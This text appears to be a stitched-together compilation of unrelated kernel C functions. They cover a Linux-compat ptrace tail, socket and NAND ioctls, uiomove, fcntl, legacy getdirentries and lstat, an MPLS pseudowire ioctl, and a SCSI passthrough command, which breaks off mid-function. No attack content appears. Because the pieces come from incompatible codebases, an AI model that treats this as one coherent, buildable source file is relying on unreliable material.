			error = kern_ptrace(td, PT_SETDBREGS, pid,
			    &u.bsd_dbreg, 0);
		}
		break;
	}
	case LINUX_PTRACE_SYSCALL:
		/* fall through */
	default:
		printf("linux: ptrace(%u, ...) not implemented\n",
		    (unsigned int)uap->req);
		error = EINVAL;
		break;
	}

	return (error);
}
/*
 * Ioctl system call (simulation environment).
 *
 * anp_ioctl - marshal an ioctl argument between user space and a
 * kernel-side buffer, dispatch it to the socket via soo_ioctl(), and
 * copy any output back.
 *
 * fd:    descriptor resolved to a socket via anp_fdfind().
 * ucom:  ioctl command; IOCPARM_LEN/IOC_IN/IOC_OUT/IOC_VOID bits in the
 *        high word drive the argument marshalling.
 * udata: user-space argument pointer.
 *
 * Returns 0 on success, -1 on failure with anp_errno set (this wrapper
 * uses the libc-style return convention, not a raw errno).
 */
int anp_ioctl(int fd,int ucom,caddr_t udata)
{
	struct socket *sock;
	register int com, error;
	register u_int size;
	caddr_t data, memp;
	int tmp;
#define STK_PARAMS 128
	/* Small arguments live on the stack; larger ones are malloc'ed. */
	char stkbuf[STK_PARAMS];

	MU_LOCK(kern_lock_p);
	sock=anp_fdfind(fd);
	com=ucom;

	/* AC: since we don't support exec() in sim. environment, we don't support
	 * these ioctl's either...
	 */
#ifdef NOPE
	switch (com = ucom) {

	case FIONCLEX:
		fdp->fd_ofileflags[uap->fd] &= ~UF_EXCLOSE;
		MU_UNLOCK(kern_lock_p);
		return (0);
	case FIOCLEX:
		fdp->fd_ofileflags[uap->fd] |= UF_EXCLOSE;
		MU_UNLOCK(kern_lock_p);
		return (0);
	}
#endif

	/*
	 * Interpret high order word to find amount of data to be
	 * copied to/from the user's address space.
	 */
	size = IOCPARM_LEN(com);
	if (size > IOCPARM_MAX) {
		anp_errno=ENOTTY;
		MU_UNLOCK(kern_lock_p);
		return -1;
	}
	memp = NULL;
	if (size > sizeof (stkbuf)) {
		memp = (caddr_t)anp_sys_malloc((u_long)size, M_IOCTLOPS, M_WAITOK);
		data = memp;
	} else
		data = stkbuf;
	if (com&IOC_IN) {
		if (size) {
			/* Input argument: copy it in before dispatch. */
			error = copyin(udata, data, (u_int)size);
			if (error) {
				if (memp)
					anp_sys_free(memp, M_IOCTLOPS);
				anp_errno=error;
				MU_UNLOCK(kern_lock_p);
				return -1;
			}
		} else
			/* No size: pass the raw pointer itself. */
			*(caddr_t *)data = udata;
	} else if ((com&IOC_OUT) && size)
		/*
		 * Zero the buffer so the user always
		 * gets back something deterministic.
		 */
		bzero(data, size);
	else if (com&IOC_VOID)
		*(caddr_t *)data = udata;

	switch (com) {

	case FIONBIO:
	case FIOASYNC:
		tmp = *((int *) data);
		error = (soo_ioctl)(sock, com, (caddr_t)&tmp);
		break;

#ifdef NOPE
	case FIOSETOWN:
		tmp = *((int *)data);
		if (fp->f_type == DTYPE_SOCKET) {
			((struct socket *)fp->f_data)->so_pgid = tmp;
			error = 0;
			break;
		}
		if (tmp <= 0) {
			tmp = -tmp;
		} else {
			struct proc *p1 = pfind(tmp);
			if (p1 == 0) {
				error = ESRCH;
				break;
			}
			tmp = p1->p_pgrp->pg_id;
		}
		error = (*fp->f_ops->fo_ioctl)
			(fp, (int)TIOCSPGRP, (caddr_t)&tmp, p);
		break;

	case FIOGETOWN:
		if (fp->f_type == DTYPE_SOCKET) {
			error = 0;
			*(int *)data = ((struct socket *)fp->f_data)->so_pgid;
			break;
		}
		error = (*fp->f_ops->fo_ioctl)(fp, (int)TIOCGPGRP, data, p);
		*(int *)data = -*(int *)data;
		break;
#endif

	default:
		error = soo_ioctl(sock, com, data);
		/*
		 * Copy any data to user, size was
		 * already set and checked above.
		 */
		if (error == 0 && (com&IOC_OUT) && size)
			error = copyout(data, udata, (u_int)size);
		break;
	}
	if (memp)
		anp_sys_free(memp, M_IOCTLOPS);
	anp_errno=error;
	MU_UNLOCK(kern_lock_p);
	if (anp_errno!=0) {
		return -1;
	} else {
		return 0;
	}
}
/*
 * uiomove - transfer up to n bytes between the kernel buffer `ptr` and
 * the scatter/gather region described by `uio`.
 *
 * For UIO_READ the data flows from `ptr` into the uio buffers; for
 * UIO_WRITE it flows from the uio buffers into `ptr`.  Kernel-space
 * iovecs are moved with memmove; user-space iovecs go through
 * copyin/copyout, whose error (if any) is returned.  The iovec list,
 * uio_resid, and uio_offset are advanced as data moves.
 *
 * Returns 0 on success or the copyin/copyout error.
 */
int
uiomove(void *ptr, size_t n, struct uio *uio)
{
	struct iovec *vec;
	size_t chunk;
	int err;

	if (uio->uio_rw != UIO_READ && uio->uio_rw != UIO_WRITE) {
		panic("uiomove: Invalid uio_rw %d\n", (int) uio->uio_rw);
	}
	/* Sanity: address space pointer must agree with the segment flag. */
	if (uio->uio_segflg==UIO_SYSSPACE) {
		KASSERT(uio->uio_space == NULL);
	}
	else {
		KASSERT(uio->uio_space == curthread->t_addrspace);
	}

	while (n > 0 && uio->uio_resid > 0) {
		/* Work on the first iovec; clip the chunk to n. */
		vec = uio->uio_iov;
		chunk = vec->iov_len;
		if (chunk > n) {
			chunk = n;
		}

		if (chunk == 0) {
			/* This iovec is exhausted; step to the next one. */
			uio->uio_iov++;
			uio->uio_iovcnt--;
			if (uio->uio_iovcnt == 0) {
				/*
				 * This should only happen if you set
				 * uio_resid incorrectly (to more than
				 * the total length of buffers the uio
				 * points to).
				 */
				panic("uiomove: ran out of buffers\n");
			}
			continue;
		}

		switch (uio->uio_segflg) {
		    case UIO_SYSSPACE:
			if (uio->uio_rw == UIO_READ) {
				memmove(vec->iov_kbase, ptr, chunk);
			}
			else {
				memmove(ptr, vec->iov_kbase, chunk);
			}
			vec->iov_kbase = ((char *)vec->iov_kbase+chunk);
			break;
		    case UIO_USERSPACE:
		    case UIO_USERISPACE:
			err = (uio->uio_rw == UIO_READ)
				? copyout(ptr, vec->iov_ubase, chunk)
				: copyin(vec->iov_ubase, ptr, chunk);
			if (err) {
				return err;
			}
			vec->iov_ubase += chunk;
			break;
		    default:
			panic("uiomove: Invalid uio_segflg %d\n",
			      (int)uio->uio_segflg);
		}

		/* Advance all the bookkeeping by the bytes just moved. */
		vec->iov_len -= chunk;
		uio->uio_resid -= chunk;
		uio->uio_offset += chunk;
		ptr = ((char *)ptr + chunk);
		n -= chunk;
	}

	return 0;
}
/*
 * The file control system call.
 *
 * sys_fcntl - dispatch the fcntl(2) commands.  Commands that do not
 * need the file object (F_CLOSEM, F_MAXFD, locking) are handled before
 * fd_getfile(); everything after holds a reference on fp that is
 * released via fd_putfile() at the end.
 */
int
sys_fcntl(struct lwp *l, const struct sys_fcntl_args *uap, register_t *retval)
{
	/* {
		syscallarg(int)		fd;
		syscallarg(int)		cmd;
		syscallarg(void *)	arg;
	} */
	int fd, i, tmp, error, cmd, newmin;
	filedesc_t *fdp;
	file_t *fp;
	struct flock fl;
	bool cloexec = false;

	fd = SCARG(uap, fd);
	cmd = SCARG(uap, cmd);
	fdp = l->l_fd;
	error = 0;

	switch (cmd) {
	case F_CLOSEM:
		/* Close every descriptor >= fd, highest first. */
		if (fd < 0)
			return EBADF;
		while ((i = fdp->fd_lastfile) >= fd) {
			if (fd_getfile(i) == NULL) {
				/* Another thread has updated. */
				continue;
			}
			fd_close(i);
		}
		return 0;

	case F_MAXFD:
		*retval = fdp->fd_lastfile;
		return 0;

	case F_SETLKW:
	case F_SETLK:
	case F_GETLK:
		/* POSIX record locks: copy the flock in/out around the op. */
		error = copyin(SCARG(uap, arg), &fl, sizeof(fl));
		if (error)
			return error;
		error = do_fcntl_lock(fd, cmd, &fl);
		if (cmd == F_GETLK && error == 0)
			error = copyout(&fl, SCARG(uap, arg), sizeof(fl));
		return error;

	default:
		/* Handled below */
		break;
	}

	if ((fp = fd_getfile(fd)) == NULL)
		return (EBADF);

	if ((cmd & F_FSCTL)) {
		/* Filesystem-private fcntl; forwarded wholesale. */
		error = fcntl_forfs(fd, fp, cmd, SCARG(uap, arg));
		fd_putfile(fd);
		return error;
	}

	switch (cmd) {
	case F_DUPFD_CLOEXEC:
		cloexec = true;
		/*FALLTHROUGH*/
	case F_DUPFD:
		newmin = (long)SCARG(uap, arg);
		if ((u_int)newmin >=
		    l->l_proc->p_rlimit[RLIMIT_NOFILE].rlim_cur ||
		    (u_int)newmin >= maxfiles) {
			fd_putfile(fd);
			return EINVAL;
		}
		error = fd_dup(fp, newmin, &i, cloexec);
		*retval = i;
		break;

	case F_GETFD:
		*retval = fdp->fd_dt->dt_ff[fd]->ff_exclose;
		break;

	case F_SETFD:
		fd_set_exclose(l, fd,
		    ((long)SCARG(uap, arg) & FD_CLOEXEC) != 0);
		break;

	case F_GETNOSIGPIPE:
		*retval = (fp->f_flag & FNOSIGPIPE) != 0;
		break;

	case F_SETNOSIGPIPE:
		if (SCARG(uap, arg))
			atomic_or_uint(&fp->f_flag, FNOSIGPIPE);
		else
			atomic_and_uint(&fp->f_flag, ~FNOSIGPIPE);
		*retval = 0;
		break;

	case F_GETFL:
		*retval = OFLAGS(fp->f_flag);
		break;

	case F_SETFL:
		/* XXX not guaranteed to be atomic. */
		tmp = FFLAGS((long)SCARG(uap, arg)) & FCNTLFLAGS;
		error = (*fp->f_ops->fo_fcntl)(fp, F_SETFL, &tmp);
		if (error)
			break;
		/* Propagate FNONBLOCK/FASYNC changes via ioctl... */
		i = tmp ^ fp->f_flag;
		if (i & FNONBLOCK) {
			int flgs = tmp & FNONBLOCK;
			error = (*fp->f_ops->fo_ioctl)(fp, FIONBIO, &flgs);
			if (error) {
				/* ...rolling back the fcntl on failure. */
				(*fp->f_ops->fo_fcntl)(fp, F_SETFL,
				    &fp->f_flag);
				break;
			}
		}
		if (i & FASYNC) {
			int flgs = tmp & FASYNC;
			error = (*fp->f_ops->fo_ioctl)(fp, FIOASYNC, &flgs);
			if (error) {
				/* Roll back FIONBIO too before bailing. */
				if (i & FNONBLOCK) {
					tmp = fp->f_flag & FNONBLOCK;
					(void)(*fp->f_ops->fo_ioctl)(fp,
					    FIONBIO, &tmp);
				}
				(*fp->f_ops->fo_fcntl)(fp, F_SETFL,
				    &fp->f_flag);
				break;
			}
		}
		fp->f_flag = (fp->f_flag & ~FCNTLFLAGS) | tmp;
		break;

	case F_GETOWN:
		error = (*fp->f_ops->fo_ioctl)(fp, FIOGETOWN, &tmp);
		*retval = tmp;
		break;

	case F_SETOWN:
		tmp = (int)(uintptr_t) SCARG(uap, arg);
		error = (*fp->f_ops->fo_ioctl)(fp, FIOSETOWN, &tmp);
		break;

	default:
		error = EINVAL;
	}

	fd_putfile(fd);
	return (error);
}
/*
 * Read a block of directory entries in a file system independent format.
 *
 * compat_43_sys_getdirentries - old (4.3BSD) getdirentries: read native
 * dirents from the vnode into a kernel buffer, then convert each record
 * to the historic dirent43 layout while copying out to the user buffer.
 * The pre-read file offset is stored through uap->basep.
 */
int
compat_43_sys_getdirentries(struct lwp *l,
    const struct compat_43_sys_getdirentries_args *uap, register_t *retval)
{
	/* {
		syscallarg(int) fd;
		syscallarg(char *) buf;
		syscallarg(u_int) count;
		syscallarg(long *) basep;
	} */
	struct dirent *bdp;
	struct vnode *vp;
	void *tbuf;			/* Current-format */
	char *inp;			/* Current-format */
	int len, reclen;		/* Current-format */
	char *outp;			/* Dirent12-format */
	int resid, old_reclen = 0;	/* Dirent12-format */
	struct file *fp;
	struct uio auio;
	struct iovec aiov;
	struct dirent43 idb;
	off_t off;		/* true file offset */
	int buflen, error, eofflag, nbytes;
	struct vattr va;
	off_t *cookiebuf = NULL, *cookie;
	int ncookies;
	long loff;

	/* fd_getvnode() will use the descriptor for us */
	if ((error = fd_getvnode(SCARG(uap, fd), &fp)) != 0)
		return (error);

	if ((fp->f_flag & FREAD) == 0) {
		error = EBADF;
		goto out1;
	}

	vp = fp->f_vnode;
	if (vp->v_type != VDIR) {
		error = ENOTDIR;
		goto out1;
	}

	vn_lock(vp, LK_SHARED | LK_RETRY);
	error = VOP_GETATTR(vp, &va, l->l_cred);
	VOP_UNLOCK(vp);
	if (error)
		goto out1;

	/* Size the staging buffer; at least one filesystem block. */
	loff = fp->f_offset;
	nbytes = SCARG(uap, count);
	buflen = min(MAXBSIZE, nbytes);
	if (buflen < va.va_blocksize)
		buflen = va.va_blocksize;
	tbuf = malloc(buflen, M_TEMP, M_WAITOK);

	vn_lock(vp, LK_EXCLUSIVE | LK_RETRY);
	off = fp->f_offset;
again:
	aiov.iov_base = tbuf;
	aiov.iov_len = buflen;
	auio.uio_iov = &aiov;
	auio.uio_iovcnt = 1;
	auio.uio_rw = UIO_READ;
	auio.uio_resid = buflen;
	auio.uio_offset = off;
	UIO_SETUP_SYSSPACE(&auio);
	/*
	 * First we read into the malloc'ed buffer, then
	 * we massage it into user space, one record at a time.
	 */
	error = VOP_READDIR(vp, &auio, fp->f_cred, &eofflag, &cookiebuf,
	    &ncookies);
	if (error)
		goto out;

	inp = (char *)tbuf;
	outp = SCARG(uap, buf);
	resid = nbytes;
	if ((len = buflen - auio.uio_resid) == 0)
		goto eof;

	for (cookie = cookiebuf; len > 0; len -= reclen) {
		bdp = (struct dirent *)inp;
		reclen = bdp->d_reclen;
		if (reclen & 3)
			/* Records must be 4-byte aligned. */
			panic(__func__);
		if (bdp->d_fileno == 0) {
			inp += reclen;	/* it is a hole; squish it out */
			if (cookie)
				off = *cookie++;
			else
				off += reclen;
			continue;
		}
		old_reclen = _DIRENT_RECLEN(&idb, bdp->d_namlen);
		if (reclen > len || resid < old_reclen) {
			/* entry too big for buffer, so just stop */
			outp++;
			break;
		}
		/*
		 * Massage in place to make a Dirent12-shaped dirent (otherwise
		 * we have to worry about touching user memory outside of
		 * the copyout() call).
		 */
		idb.d_fileno = (uint32_t)bdp->d_fileno;
		idb.d_reclen = (uint16_t)old_reclen;
		idb.d_namlen = (uint16_t)bdp->d_namlen;
		strcpy(idb.d_name, bdp->d_name);
		if ((error = copyout(&idb, outp, old_reclen)))
			goto out;
		/* advance past this real entry */
		inp += reclen;
		if (cookie)
			off = *cookie++; /* each entry points to itself */
		else
			off += reclen;
		/* advance output past Dirent12-shaped entry */
		outp += old_reclen;
		resid -= old_reclen;
	}

	/* if we squished out the whole block, try again */
	if (outp == SCARG(uap, buf)) {
		if (cookiebuf)
			free(cookiebuf, M_TEMP);
		cookiebuf = NULL;
		goto again;
	}
	fp->f_offset = off;	/* update the vnode offset */

eof:
	*retval = nbytes - resid;
out:
	VOP_UNLOCK(vp);
	if (cookiebuf)
		free(cookiebuf, M_TEMP);
	free(tbuf, M_TEMP);
out1:
	fd_putfile(SCARG(uap, fd));
	if (error)
		return error;
	/* Hand the pre-read offset back to the caller. */
	return copyout(&loff, SCARG(uap, basep), sizeof(long));
}
/*
 * compat_43_sys_lstat - old (4.3BSD) lstat: stat the file named by
 * uap->path without following a terminal symlink, convert the result to
 * the historic stat43 layout, and copy it out to uap->ub.
 *
 * For symlinks the attributes of the containing directory are reported,
 * with mode/size/links/blocks taken from the link itself (historic
 * 4.3BSD behavior).
 */
/* ARGSUSED */
int
compat_43_sys_lstat(struct lwp *l, const struct compat_43_sys_lstat_args *uap,
    register_t *retval)
{
	/* {
		syscallarg(char *) path;
		syscallarg(struct ostat *) ub;
	} */
	struct vnode *vp, *dvp;
	struct stat sb, sb1;
	struct stat43 osb;
	int error;
	struct pathbuf *pb;
	struct nameidata nd;
	int ndflags;

	error = pathbuf_copyin(SCARG(uap, path), &pb);
	if (error) {
		return error;
	}

	ndflags = NOFOLLOW | LOCKLEAF | LOCKPARENT | TRYEMULROOT;
again:
	NDINIT(&nd, LOOKUP, ndflags, pb);
	if ((error = namei(&nd))) {
		if (error == EISDIR && (ndflags & LOCKPARENT) != 0) {
			/*
			 * Should only happen on '/'. Retry without LOCKPARENT;
			 * this is safe since the vnode won't be a VLNK.
			 */
			ndflags &= ~LOCKPARENT;
			goto again;
		}
		pathbuf_destroy(pb);
		return (error);
	}
	/*
	 * For symbolic links, always return the attributes of its
	 * containing directory, except for mode, size, and links.
	 */
	vp = nd.ni_vp;
	dvp = nd.ni_dvp;
	pathbuf_destroy(pb);
	if (vp->v_type != VLNK) {
		/* Not a symlink: drop the parent and stat the leaf. */
		if ((ndflags & LOCKPARENT) != 0) {
			if (dvp == vp)
				vrele(dvp);
			else
				vput(dvp);
		}
		error = vn_stat(vp, &sb);
		vput(vp);
		if (error)
			return (error);
	} else {
		/* Symlink: stat the parent, then merge in link attrs. */
		error = vn_stat(dvp, &sb);
		vput(dvp);
		if (error) {
			vput(vp);
			return (error);
		}
		error = vn_stat(vp, &sb1);
		vput(vp);
		if (error)
			return (error);
		sb.st_mode &= ~S_IFDIR;
		sb.st_mode |= S_IFLNK;
		sb.st_nlink = sb1.st_nlink;
		sb.st_size = sb1.st_size;
		sb.st_blocks = sb1.st_blocks;
	}
	/* Convert to the historic layout and hand it to the caller. */
	cvtstat(&sb, &osb);
	error = copyout((void *)&osb, (void *)SCARG(uap, ub), sizeof (osb));
	return (error);
}
/*
 * Character-device ioctl entry point for a NAND chip.
 *
 * Raw read/program requests are transferred in bounded chunks (16 pages
 * of page+OOB data at a time) so we never allocate an unbounded kernel
 * buffer for a large user transfer.
 *
 * Returns 0 on success or an errno.
 */
static int
nand_ioctl(struct cdev *dev, u_long cmd, caddr_t data, int fflag, struct thread *td)
{
	struct nand_chip *chip;
	struct chip_geom *cg;
	struct nand_oob_rw *oob_rw = NULL;
	struct nand_raw_rw *raw_rw = NULL;
	device_t nandbus;
	size_t bufsize = 0, len = 0;
	size_t raw_size;
	off_t off;
	uint8_t *buf = NULL;
	int ret = 0;
	uint8_t status;

	chip = (struct nand_chip *)dev->si_drv1;
	cg = &chip->chip_geom;
	nandbus = device_get_parent(chip->dev);

	/* Common setup for the two raw-transfer commands. */
	if ((cmd == NAND_IO_RAW_READ) || (cmd == NAND_IO_RAW_PROG)) {
		raw_rw = (struct nand_raw_rw *)data;
		raw_size = cg->pgs_per_blk * (cg->page_size + cg->oob_size);
		/*
		 * Check if len is not bigger than chip size.
		 * NOTE(review): raw_size is one erase block's worth of
		 * raw data, not the whole chip — confirm intended limit.
		 */
		if (raw_rw->len > raw_size)
			return (EFBIG);
		/*
		 * Do not ask for too much memory, in case of large transfers
		 * read/write in 16-pages chunks
		 */
		bufsize = 16 * (cg->page_size + cg->oob_size);
		if (raw_rw->len < bufsize)
			bufsize = raw_rw->len;
		buf = malloc(bufsize, M_NAND, M_WAITOK);
		len = raw_rw->len;
		off = 0;
	}

	switch(cmd) {
	case NAND_IO_ERASE:
		/* data = { start offset, length } as two off_t values */
		ret = nand_erase_blocks(chip, ((off_t *)data)[0],
		    ((off_t *)data)[1]);
		break;

	case NAND_IO_OOB_READ:
		oob_rw = (struct nand_oob_rw *)data;
		/* Final 0 selects read access. */
		ret = nand_oob_access(chip, oob_rw->page, 0,
		    oob_rw->len, oob_rw->data, 0);
		break;

	case NAND_IO_OOB_PROG:
		oob_rw = (struct nand_oob_rw *)data;
		/* Final 1 selects program (write) access. */
		ret = nand_oob_access(chip, oob_rw->page, 0,
		    oob_rw->len, oob_rw->data, 1);
		break;

	case NAND_IO_GET_STATUS:
		NANDBUS_LOCK(nandbus);
		ret = NANDBUS_GET_STATUS(nandbus, &status);
		if (ret == 0)
			*(uint8_t *)data = status;
		NANDBUS_UNLOCK(nandbus);
		break;

	case NAND_IO_RAW_PROG:
		/* Copy from user and program, one chunk at a time. */
		while (len > 0) {
			if (len < bufsize)
				bufsize = len;	/* final partial chunk */
			ret = copyin(raw_rw->data + off, buf, bufsize);
			if (ret)
				break;
			ret = nand_prog_pages_raw(chip, raw_rw->off + off,
			    buf, bufsize);
			if (ret)
				break;
			len -= bufsize;
			off += bufsize;
		}
		break;

	case NAND_IO_RAW_READ:
		/* Read from flash and copy out, one chunk at a time. */
		while (len > 0) {
			if (len < bufsize)
				bufsize = len;	/* final partial chunk */
			ret = nand_read_pages_raw(chip, raw_rw->off + off,
			    buf, bufsize);
			if (ret)
				break;
			ret = copyout(buf, raw_rw->data + off, bufsize);
			if (ret)
				break;
			len -= bufsize;
			off += bufsize;
		}
		break;

	case NAND_IO_PAGE_STAT:
		ret = nand_page_stat(chip, (struct page_stat_io *)data);
		break;

	case NAND_IO_BLOCK_STAT:
		ret = nand_block_stat(chip, (struct block_stat_io *)data);
		break;

	case NAND_IO_GET_CHIP_PARAM:
		nand_get_chip_param(chip, (struct chip_param_io *)data);
		break;

	default:
		printf("Unknown nand_ioctl request \n");
		ret = EIO;
	}

	if (buf)
		free(buf, M_NAND);

	return (ret);
}
/*
 * ioctl handler for an MPLS pseudowire (mpw) interface.
 *
 * SIOCSETMPWCFG installs/tears down the pseudowire configuration:
 * local/remote MPLS shim labels plus the IPv4 nexthop.  A nexthop of
 * 0.0.0.0 means "tear everything down".
 *
 * Returns 0 on success or an errno.
 */
int
mpw_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data)
{
	struct ifreq *ifr = (struct ifreq *) data;
	struct mpw_softc *sc = ifp->if_softc;
	struct sockaddr_in *sin;
	struct sockaddr_in *sin_nexthop;
	int error = 0;
	int s;
	struct ifmpwreq imr;

	switch (cmd) {
	case SIOCSIFMTU:
		if (ifr->ifr_mtu < MPE_MTU_MIN ||
		    ifr->ifr_mtu > MPE_MTU_MAX)
			error = EINVAL;
		else
			ifp->if_mtu = ifr->ifr_mtu;
		break;

	case SIOCSIFFLAGS:
		/* RUNNING simply tracks UP for this virtual interface. */
		if ((ifp->if_flags & IFF_UP))
			ifp->if_flags |= IFF_RUNNING;
		else
			ifp->if_flags &= ~IFF_RUNNING;
		break;

	case SIOCSETMPWCFG:
		/* Privileged operation: changes routing state. */
		error = suser(curproc, 0);
		if (error != 0)
			break;

		error = copyin(ifr->ifr_data, &imr, sizeof(imr));
		if (error != 0)
			break;

		/* Teardown all configuration if got no nexthop */
		sin = (struct sockaddr_in *) &imr.imr_nexthop;
		if (sin->sin_addr.s_addr == 0) {
			s = splsoftnet();
			if (rt_ifa_del(&sc->sc_ifa, RTF_MPLS,
			    smplstosa(&sc->sc_smpls)) == 0)
				sc->sc_smpls.smpls_label = 0;
			splx(s);

			memset(&sc->sc_rshim, 0, sizeof(sc->sc_rshim));
			memset(&sc->sc_nexthop, 0, sizeof(sc->sc_nexthop));
			sc->sc_flags = 0;
			sc->sc_type = 0;
			break;
		}

		/* Validate input */
		if (sin->sin_family != AF_INET ||
		    imr.imr_lshim.shim_label > MPLS_LABEL_MAX ||
		    imr.imr_lshim.shim_label <= MPLS_LABEL_RESERVED_MAX ||
		    imr.imr_rshim.shim_label > MPLS_LABEL_MAX ||
		    imr.imr_rshim.shim_label <= MPLS_LABEL_RESERVED_MAX) {
			error = EINVAL;
			break;
		}

		/* Setup labels and create inbound route */
		imr.imr_lshim.shim_label =
		    htonl(imr.imr_lshim.shim_label << MPLS_LABEL_OFFSET);
		imr.imr_rshim.shim_label =
		    htonl(imr.imr_rshim.shim_label << MPLS_LABEL_OFFSET);

		/* Only touch the routing table if the local label changed. */
		if (sc->sc_smpls.smpls_label != imr.imr_lshim.shim_label) {
			s = splsoftnet();
			if (sc->sc_smpls.smpls_label)
				rt_ifa_del(&sc->sc_ifa, RTF_MPLS,
				    smplstosa(&sc->sc_smpls));

			sc->sc_smpls.smpls_label = imr.imr_lshim.shim_label;
			error = rt_ifa_add(&sc->sc_ifa, RTF_MPLS,
			    smplstosa(&sc->sc_smpls));
			splx(s);
			if (error != 0) {
				/* Route add failed: forget the label. */
				sc->sc_smpls.smpls_label = 0;
				break;
			}
		}

		/* Apply configuration */
		sc->sc_flags = imr.imr_flags;
		sc->sc_type = imr.imr_type;
		sc->sc_rshim.shim_label = imr.imr_rshim.shim_label;
		/* Outgoing shim is always bottom-of-stack. */
		sc->sc_rshim.shim_label |= MPLS_BOS_MASK;

		memset(&sc->sc_nexthop, 0, sizeof(sc->sc_nexthop));
		sin_nexthop = (struct sockaddr_in *) &sc->sc_nexthop;
		sin_nexthop->sin_family = sin->sin_family;
		sin_nexthop->sin_len = sizeof(struct sockaddr_in);
		sin_nexthop->sin_addr.s_addr = sin->sin_addr.s_addr;
		break;

	case SIOCGETMPWCFG:
		/* Report labels back in host order, shims unpacked. */
		imr.imr_flags = sc->sc_flags;
		imr.imr_type = sc->sc_type;
		imr.imr_lshim.shim_label =
		    ((ntohl(sc->sc_smpls.smpls_label & MPLS_LABEL_MASK)) >>
		    MPLS_LABEL_OFFSET);
		imr.imr_rshim.shim_label =
		    ((ntohl(sc->sc_rshim.shim_label & MPLS_LABEL_MASK)) >>
		    MPLS_LABEL_OFFSET);
		memcpy(&imr.imr_nexthop, &sc->sc_nexthop,
		    sizeof(imr.imr_nexthop));

		error = copyout(&imr, ifr->ifr_data, sizeof(imr));
		break;

	default:
		error = ENOTTY;
		break;
	}

	return (error);
}
/*
 * Generic SCSI passthrough command entry point.
 *
 * Takes a user (or kernel, if DKERNEL) scmd_t describing a CDB, optional
 * data phase and optional sense buffer; pins and DMA-maps the data
 * buffer, issues the command via devstrat(), and on CHECK CONDITION
 * automatically runs a REQUEST SENSE.  The `upin` counter tracks how far
 * buffer setup got (1 = pinned, 2 = pinned + xmattach'ed) so the `out:`
 * path can unwind exactly what was done.
 *
 * Returns 0 on success or an errno (also posted via setuerror()).
 */
static int
gsccmd(dev_t dev, scmd_t *argcmd, ulong dflag)
{
	gsc_softc_t *sp;
	scmd_t local, *l;
	char sbyte, albits;
	struct sc_buf *usc;
	struct buf *Ubp;
	int r, r2, ival, upin, unit, rqvalid, once;

	unit = minor(dev);
	Trace2(1, "%d: cmd for unit %d", __LINE__, minor(dev));
	if (unit < 0 || unit >= MAX_UNITS) {
		setuerror(ENXIO);
		return (ENXIO);
	}
	sp = &softinfo[unit];
	if (sp->iscfg == 0 || sp->fp == NULL) {
		Trace2(0, "gsccmd: bad unit %d (cfg=%d)", unit, sp->iscfg);
		r = ENODEV;
		setuerror(r);
		return (r);
	}
	/* Serializes the whole command; released via MJ_RTN. */
	simple_lock(&sp->dd_lock);

	/* Kernel callers pass the scmd_t directly; users are copied in. */
	l = &local;
	if (dflag & DKERNEL) {
		l = argcmd;
	} else {
		r = copyin((caddr_t) argcmd, (caddr_t) l, sizeof (scmd_t));
		if (r != 0) {
			Trace2(0, "%d: copyin=%d", __LINE__, r);
			setuerror(r);
			MJ_RTN (r);
		}
	}

	Trace6(1, "%d: cdblen%d datalen%d snslen%d rw=%d tv=%d", __LINE__,
	    l->cdblen, l->datalen, l->senselen, l->rw, l->timeval);
	sbyte = 0;
	rqvalid = upin = r = r2 = 0;
	usc = &sp->cmdbuf;
	Ubp = &usc->bufstruct;
	memset(usc, 0, sizeof (struct sc_buf));

	/*
	 * Check some parameters...
	 */
	if (l->cdblen > sizeof (struct sc_cmd)) {
		r = EINVAL;
		goto out;
	}

	/*
	 * Setup sc_buf structure
	 */
	Ubp->b_iodone = gscdd_intr;
	Ubp->b_dev = sp->dev;
	Ubp->b_flags = B_BUSY | B_MPSAFE;
	Ubp->b_resid = Ubp->b_bcount = l->datalen;
	Ubp->b_xmemd.aspace_id = XMEM_INVAL;
	Ubp->b_event = EVENT_NULL;

	if (l->datalen) {
		Ubp->b_un.b_addr = l->data_buf;
		if (l->rw) {
			Ubp->b_flags |= B_READ;
		}
		/* Pin the data buffer in the caller's address space. */
		if (dflag & DKERNEL) {
			r = pinu(l->data_buf, l->datalen, UIO_SYSSPACE);
		} else {
			r = pinu(l->data_buf, l->datalen, UIO_USERSPACE);
		}
		if (r) {
			Trace2(0, "%d: pinu buf %d", __LINE__, r);
			goto out;
		}
		upin++;		/* 1: pinned */
		/* Attach it for cross-memory (DMA) access. */
		if (dflag & DKERNEL) {
			r = xmattach(l->data_buf, l->datalen, &Ubp->b_xmemd,
			    SYS_ADSPACE);
		} else {
			r = xmattach(l->data_buf, l->datalen, &Ubp->b_xmemd,
			    USER_ADSPACE);
		}
		if (r != XMEM_SUCC) {
			Trace2(0, "%d: xmattach %d", __LINE__, r);
			r = EFAULT;
			goto out;
		}
		upin++;		/* 2: pinned + attached */
		r = xmemdma(&Ubp->b_xmemd, l->data_buf, XMEM_UNHIDE);
		if (r == XMEM_FAIL) {
			Trace2(0, "%d: xmemdma %d", __LINE__, r);
			r = EFAULT;
			goto out;
		}
		r = 0;
	}

	/* Copy the CDB into the command block. */
	usc->scsi_command.scsi_id = sp->tgt;
	usc->scsi_command.scsi_length = l->cdblen;
	if (dflag & DKERNEL) {
		bcopy(l->cdb, (caddr_t)&usc->scsi_command.scsi_cmd, l->cdblen);
	} else {
		r = copyin(l->cdb, (caddr_t) & usc->scsi_command.scsi_cmd,
		    l->cdblen);
		if (r != 0) {
			goto out;
		}
	}

	/* Setting lun in SCSI CDB as well as sc_buf structure */
	usc->lun = sp->lun;
	usc->scsi_command.scsi_cmd.lun &= 0x1F;
	usc->scsi_command.scsi_cmd.lun |= (sp->lun << 5) & 0xE0;
	albits = usc->scsi_command.scsi_cmd.lun;
	usc->timeout_value = l->timeval;
	/* A previous error means the adapter needs a resume first. */
	if (sp->needresume) {
		usc->flags |= SC_RESUME;
		sp->needresume = 0;
	}

	if (scudebug > 1) {
		char *c = (char *) &usc->scsi_command.scsi_cmd;
		char cdbuf[64];
		(void) sprintf(cdbuf,
		    "0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x "
		    "0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x",
		    c[0], c[1], c[2], c[3], c[4], c[5],
		    c[6], c[7], c[8], c[9], c[10], c[11]);
		Trace2(0, "%d: cdb=%s", __LINE__, cdbuf);
	}

	once = 0;
again:
	Ubp->b_flags &= ~B_DONE;
	r = devstrat(Ubp);
	if (r == 0) {
		/* Wait for gscdd_intr to mark the buf done. */
